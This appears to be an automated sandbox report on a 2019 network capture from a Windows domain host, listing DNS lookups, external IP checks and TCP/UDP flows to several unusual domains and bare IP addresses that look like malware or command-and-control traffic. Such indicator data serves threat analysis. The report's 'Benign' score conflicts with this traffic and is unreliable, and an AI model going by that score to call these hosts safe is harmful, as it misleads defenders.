Analysis

Category Package Started Completed Duration Log
PCAP 2019-10-08 08:09:28 2019-10-08 08:09:28 0 seconds Show Log

    

MalScore

1.0

Benign


Signatures

Looks up the external IP address
domain: myip.opendns.com

Hosts

Direct IP Country Name
N 91.240.87.19 [VT] Russian Federation
Y 89.163.144.224 [VT] Germany
Y 85.114.134.49 [VT] Germany
N 72.21.81.200 [VT] United States
Y 68.65.122.52 [VT] United States
N 37.230.112.226 [VT] Russian Federation
N 23.218.156.11 [VT] United States
N 208.91.197.91 [VT] Virgin Islands, British
N 208.67.222.222 [VT] United States
Y 198.54.125.57 [VT] United States
Y 198.54.115.33 [VT] United States
Y 185.212.47.167 [VT] Germany
N 185.158.249.39 [VT] Netherlands
N 185.139.69.88 [VT] unknown
Y 185.136.169.160 [VT] Germany
N 176.10.125.110 [VT] Switzerland
Y 162.213.250.131 [VT] United States
Y 151.106.27.208 [VT] France
N 109.230.199.24 [VT] Sweden
N 104.73.85.137 [VT] United States

DNS

Name Response Post-Analysis Lookup
_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.stingrayahoy.com [VT]
stingrayahoy-dc.stingrayahoy.com [VT] A 10.0.90.9 [VT]
_ldap._tcp.Default-First-Site-Name._sites.ForestDnsZones.stingrayahoy.com [VT]
_ldap._tcp.Default-First-Site-Name._sites.stingrayahoy.com [VT]
_ldap._tcp.Default-First-Site-Name._sites.DomainDnsZones.stingrayahoy.com [VT]
wpad.stingrayahoy.com [VT] NXDOMAIN [VT]
StingrayAhoy-DC.stingrayahoy.com [VT]
isatap.stingrayahoy.com [VT]
isatap.localdomain [VT]
_ldap._tcp.Default-First-Site-Name._sites.StingrayAhoy-DC.stingrayahoy.com [VT]
_ldap._tcp.StingrayAhoy-DC.stingrayahoy.com [VT]
www.msftncsi.com [VT] A 23.218.156.26 [VT]
CNAME www.msftncsi.com.edgesuite.net [VT]
A 23.218.156.11 [VT]
CNAME a1961.g2.akamai.net [VT]
dns.msftncsi.com [VT] A 131.107.255.255 [VT]
dns.msftncsi.com [VT] AAAA fd3e:4f5a:5b81::1 [VT]
Seoul-4a67-PC.stingrayahoy.com [VT]
stingrayahoy.com [VT] CNAME Seoul-4a67-PC.stingrayahoy.com [VT]
CNAME Seoul-4a67-PC.stingrayahoy.com [VT]
ljeffery54ae.top [VT] A 91.240.87.19 [VT]
ksoniay95ee.info [VT] A 37.230.112.226 [VT]
api.bing.com [VT] CNAME api-bing-com.e-0001.e-msedge.net [VT]
CNAME e-0001.e-msedge.net [VT]
A 13.107.5.80 [VT]
www.bing.com [VT] CNAME dual-a-0001.a-msedge.net [VT]
CNAME a-0001.a-afdentry.net.trafficmanager.net [VT]
A 204.79.197.200 [VT]
A 13.107.21.200 [VT]
iecvlist.microsoft.com [VT] CNAME cs9.wpc.v0cdn.net [VT]
CNAME ie9comview.vo.msecnd.net [VT]
A 72.21.81.200 [VT]
resolver1.opendns.com [VT] A 208.67.222.222 [VT]
222.222.67.208.in-addr.arpa [VT] PTR resolver1.opendns.com [VT]
myip.opendns.com.stingrayahoy.com [VT]
myip.opendns.com.stingrayahoy.com [VT]
myip.opendns.com [VT] A 173.166.146.112 [VT]
myip.opendns.com [VT]
zindv.club [VT] A 185.139.69.88 [VT]
www.download.windowsupdate.com [VT] A 104.73.85.137 [VT]
CNAME 2-01-3cf7-0009.cdx.cedexis.net [VT]
CNAME download.windowsupdate.com.edgesuite.net [VT]
CNAME a767.dspw65.akamai.net [VT]
pompeiiii.org [VT] A 208.91.197.91 [VT]
adsfinder.xyz [VT] A 185.158.249.39 [VT]
wpad.localdomain [VT]
qqtube.club [VT] A 109.230.199.24 [VT]
parolinos.xyz [VT] A 176.10.125.110 [VT]

Hosts

Direct IP Country Name
N 91.240.87.19 [VT] Russian Federation
Y 89.163.144.224 [VT] Germany
Y 85.114.134.49 [VT] Germany
N 72.21.81.200 [VT] United States
Y 68.65.122.52 [VT] United States
N 37.230.112.226 [VT] Russian Federation
N 23.218.156.11 [VT] United States
N 208.91.197.91 [VT] Virgin Islands, British
N 208.67.222.222 [VT] United States
Y 198.54.125.57 [VT] United States
Y 198.54.115.33 [VT] United States
Y 185.212.47.167 [VT] Germany
N 185.158.249.39 [VT] Netherlands
N 185.139.69.88 [VT] unknown
Y 185.136.169.160 [VT] Germany
N 176.10.125.110 [VT] Switzerland
Y 162.213.250.131 [VT] United States
Y 151.106.27.208 [VT] France
N 109.230.199.24 [VT] Sweden
N 104.73.85.137 [VT] United States

TCP

Source Source Port Destination Destination Port
10.0.90.175 49155 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 135
10.0.90.175 49156 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 49158
10.0.90.175 49157 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49158 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49159 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49160 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49161 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49162 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49163 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49164 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49165 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49166 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49167 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49168 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49170 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49171 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49172 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49173 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 49155
10.0.90.175 49174 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49175 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49176 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49177 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49178 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49179 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49180 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49181 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49182 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49184 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49185 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49186 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49187 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49188 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49189 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49190 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49191 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49192 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49193 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49194 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49196 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49197 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49198 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49199 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49200 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49208 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 135
10.0.90.175 49209 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 49155
10.0.90.175 49220 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49226 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49232 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49237 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49243 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49248 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49249 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49252 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 135
10.0.90.175 49253 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 49158
10.0.90.175 49254 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 49155
10.0.90.175 49255 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49256 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49257 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49261 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 135
10.0.90.175 49262 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 49155
10.0.90.175 49263 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49264 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49265 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49266 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49267 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49268 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49273 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49277 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49278 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49284 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49289 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49295 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49300 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49301 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 135
10.0.90.175 49302 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 49158
10.0.90.175 49303 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 49155
10.0.90.175 49304 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49305 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49306 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49312 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49316 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 135
10.0.90.175 49317 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 49155
10.0.90.175 49318 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49319 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49320 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49321 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49322 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49324 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49330 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49335 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49341 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49347 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49352 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 135
10.0.90.175 49353 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 49155
10.0.90.175 49354 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 135
10.0.90.175 49355 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 49155
10.0.90.175 49356 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 49158
10.0.90.175 49357 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49358 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49359 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49365 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49370 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49374 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 135
10.0.90.175 49375 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 49155
10.0.90.175 49376 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49377 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49378 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 88
10.0.90.175 49379 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49380 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49383 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49388 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49394 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 445
10.0.90.175 49211 104.73.85.137 www.download.windowsupdate.com 80
10.0.90.175 49363 109.230.199.24 qqtube.club 443
10.0.90.175 49364 109.230.199.24 qqtube.club 443
10.0.90.175 49366 109.230.199.24 qqtube.club 443
10.0.90.175 49367 109.230.199.24 qqtube.club 443
10.0.90.175 49368 109.230.199.24 qqtube.club 443
10.0.90.175 49391 109.230.199.24 qqtube.club 443
10.0.90.175 49392 109.230.199.24 qqtube.club 443
10.0.90.175 49393 109.230.199.24 qqtube.club 443
10.0.90.175 49213 151.106.27.208 80
10.0.90.175 49216 151.106.27.208 80
10.0.90.175 49350 162.213.250.131 80
10.0.90.175 49371 176.10.125.110 parolinos.xyz 443
10.0.90.175 49372 176.10.125.110 parolinos.xyz 443
10.0.90.175 49396 176.10.125.110 parolinos.xyz 443
10.0.90.175 49397 176.10.125.110 parolinos.xyz 443
10.0.90.175 49215 185.136.169.160 443
10.0.90.175 49217 185.136.169.160 443
10.0.90.175 49218 185.136.169.160 443
10.0.90.175 49219 185.136.169.160 443
10.0.90.175 49221 185.136.169.160 443
10.0.90.175 49222 185.136.169.160 443
10.0.90.175 49223 185.136.169.160 443
10.0.90.175 49224 185.136.169.160 443
10.0.90.175 49225 185.136.169.160 443
10.0.90.175 49227 185.136.169.160 443
10.0.90.175 49228 185.136.169.160 443
10.0.90.175 49229 185.136.169.160 443
10.0.90.175 49230 185.136.169.160 443
10.0.90.175 49231 185.136.169.160 443
10.0.90.175 49233 185.136.169.160 443
10.0.90.175 49234 185.136.169.160 443
10.0.90.175 49235 185.136.169.160 443
10.0.90.175 49236 185.136.169.160 443
10.0.90.175 49238 185.136.169.160 443
10.0.90.175 49239 185.136.169.160 443
10.0.90.175 49240 185.136.169.160 443
10.0.90.175 49241 185.136.169.160 443
10.0.90.175 49242 185.136.169.160 443
10.0.90.175 49244 185.136.169.160 443
10.0.90.175 49245 185.136.169.160 443
10.0.90.175 49246 185.136.169.160 443
10.0.90.175 49247 185.136.169.160 443
10.0.90.175 49250 185.136.169.160 443
10.0.90.175 49251 185.136.169.160 443
10.0.90.175 49258 185.136.169.160 443
10.0.90.175 49259 185.136.169.160 443
10.0.90.175 49260 185.136.169.160 443
10.0.90.175 49269 185.136.169.160 443
10.0.90.175 49270 185.136.169.160 443
10.0.90.175 49271 185.136.169.160 443
10.0.90.175 49272 185.136.169.160 443
10.0.90.175 49274 185.136.169.160 443
10.0.90.175 49275 185.136.169.160 443
10.0.90.175 49276 185.136.169.160 443
10.0.90.175 49279 185.136.169.160 443
10.0.90.175 49280 185.136.169.160 443
10.0.90.175 49281 185.136.169.160 443
10.0.90.175 49282 185.136.169.160 443
10.0.90.175 49283 185.136.169.160 443
10.0.90.175 49285 185.136.169.160 443
10.0.90.175 49286 185.136.169.160 443
10.0.90.175 49287 185.136.169.160 443
10.0.90.175 49288 185.136.169.160 443
10.0.90.175 49290 185.136.169.160 443
10.0.90.175 49291 185.136.169.160 443
10.0.90.175 49292 185.136.169.160 443
10.0.90.175 49293 185.136.169.160 443
10.0.90.175 49294 185.136.169.160 443
10.0.90.175 49296 185.136.169.160 443
10.0.90.175 49297 185.136.169.160 443
10.0.90.175 49298 185.136.169.160 443
10.0.90.175 49299 185.136.169.160 443
10.0.90.175 49307 185.136.169.160 443
10.0.90.175 49308 185.136.169.160 443
10.0.90.175 49309 185.136.169.160 443
10.0.90.175 49310 185.136.169.160 443
10.0.90.175 49311 185.136.169.160 443
10.0.90.175 49313 185.136.169.160 443
10.0.90.175 49314 185.136.169.160 443
10.0.90.175 49315 185.136.169.160 443
10.0.90.175 49210 185.139.69.88 zindv.club 443
10.0.90.175 49212 185.139.69.88 zindv.club 443
10.0.90.175 49214 185.139.69.88 zindv.club 443
10.0.90.175 49348 185.158.249.39 adsfinder.xyz 443
10.0.90.175 49349 185.158.249.39 adsfinder.xyz 443
10.0.90.175 49360 185.158.249.39 adsfinder.xyz 443
10.0.90.175 49361 185.158.249.39 adsfinder.xyz 443
10.0.90.175 49381 185.158.249.39 adsfinder.xyz 443
10.0.90.175 49382 185.158.249.39 adsfinder.xyz 443
10.0.90.175 49384 185.158.249.39 adsfinder.xyz 443
10.0.90.175 49385 185.158.249.39 adsfinder.xyz 443
10.0.90.175 49386 185.158.249.39 adsfinder.xyz 443
10.0.90.175 49387 185.158.249.39 adsfinder.xyz 443
10.0.90.175 49389 185.158.249.39 adsfinder.xyz 443
10.0.90.175 49325 185.212.47.167 443
10.0.90.175 49326 185.212.47.167 443
10.0.90.175 49327 185.212.47.167 443
10.0.90.175 49328 185.212.47.167 443
10.0.90.175 49329 185.212.47.167 443
10.0.90.175 49331 185.212.47.167 443
10.0.90.175 49332 185.212.47.167 443
10.0.90.175 49333 185.212.47.167 443
10.0.90.175 49334 185.212.47.167 443
10.0.90.175 49336 185.212.47.167 443
10.0.90.175 49337 185.212.47.167 443
10.0.90.175 49338 185.212.47.167 443
10.0.90.175 49339 185.212.47.167 443
10.0.90.175 49340 185.212.47.167 443
10.0.90.175 49342 185.212.47.167 443
10.0.90.175 49343 185.212.47.167 443
10.0.90.175 49344 185.212.47.167 443
10.0.90.175 49345 185.212.47.167 443
10.0.90.175 49369 198.54.115.33 443
10.0.90.175 49395 198.54.115.33 443
10.0.90.175 49362 198.54.125.57 443
10.0.90.175 49390 198.54.125.57 443
10.0.90.175 49323 208.91.197.91 pompeiiii.org 443
10.0.90.175 49183 23.218.156.11 www.msftncsi.com 80
10.0.90.175 49202 37.230.112.226 ksoniay95ee.info 80
10.0.90.175 49203 37.230.112.226 ksoniay95ee.info 80
10.0.90.175 49204 37.230.112.226 ksoniay95ee.info 80
10.0.90.175 49205 37.230.112.226 ksoniay95ee.info 80
10.0.90.175 49373 68.65.122.52 443
10.0.90.175 49206 72.21.81.200 iecvlist.microsoft.com 443
10.0.90.175 49207 72.21.81.200 iecvlist.microsoft.com 443
10.0.90.175 49351 85.114.134.49 80
10.0.90.175 49346 89.163.144.224 80
10.0.90.175 49201 91.240.87.19 ljeffery54ae.top 80
10.0.90.9 445 10.0.90.175 49189
10.0.90.9 445 10.0.90.175 49201
187.188.166.192 80 10.0.90.175 49209
216.98.148.157 8080 10.0.90.175 49210

UDP

Source Source Port Destination Destination Port
10.0.90.175 137 10.0.90.255 137
10.0.90.175 123 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 123
10.0.90.175 49480 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 49481 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49482 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 49998 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 50013 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 50073 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 51572 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 52092 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 52093 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 52393 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 52727 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 53010 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 53640 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 53775 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 53996 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 54226 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 54227 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 54403 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 54547 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 54639 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 54715 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 55382 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 55465 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 55480 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 55709 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 55710 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 55773 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 55983 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 56060 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 56229 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 56239 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 56761 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 56903 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 57126 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 57265 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 57266 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 57385 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 57450 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 57906 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 57937 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 58439 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 58440 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 58441 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 58664 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 58900 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 59671 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 59790 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 59791 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 59964 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 60014 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 60322 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 60323 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 60369 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 60407 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 60509 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 60962 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 60967 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 60969 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 60970 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 61041 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 61413 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 61436 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 61885 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 61886 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 61988 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 62142 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 62852 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 63136 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 63637 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 63956 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 63957 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 63958 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 63959 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 64150 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 64206 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 64207 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 64252 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 64253 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 64254 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 64355 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 64775 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 64911 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 64912 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 389
10.0.90.175 65030 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 65497 10.0.90.9 stingrayahoy-dc.stingrayahoy.com 53
10.0.90.175 56762 208.67.222.222 resolver1.opendns.com 53
10.0.90.175 56763 208.67.222.222 resolver1.opendns.com 53
10.0.90.175 56764 208.67.222.222 resolver1.opendns.com 53
10.0.90.175 56765 208.67.222.222 resolver1.opendns.com 53
10.0.90.175 56766 208.67.222.222 resolver1.opendns.com 53
10.0.90.175 49882 224.0.0.252 5355
10.0.90.175 52750 224.0.0.252 5355
10.0.90.175 57910 224.0.0.252 5355
10.0.90.175 60681 224.0.0.252 5355
10.0.90.175 64205 224.0.0.252 5355
10.0.90.175 65004 224.0.0.252 5355
10.0.90.175 68 255.255.255.255 67
10.0.90.9 67 10.0.90.175 68

DNS

Name Response Post-Analysis Lookup
_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.stingrayahoy.com [VT]
stingrayahoy-dc.stingrayahoy.com [VT] A 10.0.90.9 [VT]
_ldap._tcp.Default-First-Site-Name._sites.ForestDnsZones.stingrayahoy.com [VT]
_ldap._tcp.Default-First-Site-Name._sites.stingrayahoy.com [VT]
_ldap._tcp.Default-First-Site-Name._sites.DomainDnsZones.stingrayahoy.com [VT]
wpad.stingrayahoy.com [VT] NXDOMAIN [VT]
StingrayAhoy-DC.stingrayahoy.com [VT]
isatap.stingrayahoy.com [VT]
isatap.localdomain [VT]
_ldap._tcp.Default-First-Site-Name._sites.StingrayAhoy-DC.stingrayahoy.com [VT]
_ldap._tcp.StingrayAhoy-DC.stingrayahoy.com [VT]
www.msftncsi.com [VT] A 23.218.156.26 [VT]
CNAME www.msftncsi.com.edgesuite.net [VT]
A 23.218.156.11 [VT]
CNAME a1961.g2.akamai.net [VT]
dns.msftncsi.com [VT] A 131.107.255.255 [VT]
dns.msftncsi.com [VT] AAAA fd3e:4f5a:5b81::1 [VT]
Seoul-4a67-PC.stingrayahoy.com [VT]
stingrayahoy.com [VT] CNAME Seoul-4a67-PC.stingrayahoy.com [VT]
CNAME Seoul-4a67-PC.stingrayahoy.com [VT]
ljeffery54ae.top [VT] A 91.240.87.19 [VT]
ksoniay95ee.info [VT] A 37.230.112.226 [VT]
api.bing.com [VT] CNAME api-bing-com.e-0001.e-msedge.net [VT]
CNAME e-0001.e-msedge.net [VT]
A 13.107.5.80 [VT]
www.bing.com [VT] CNAME dual-a-0001.a-msedge.net [VT]
CNAME a-0001.a-afdentry.net.trafficmanager.net [VT]
A 204.79.197.200 [VT]
A 13.107.21.200 [VT]
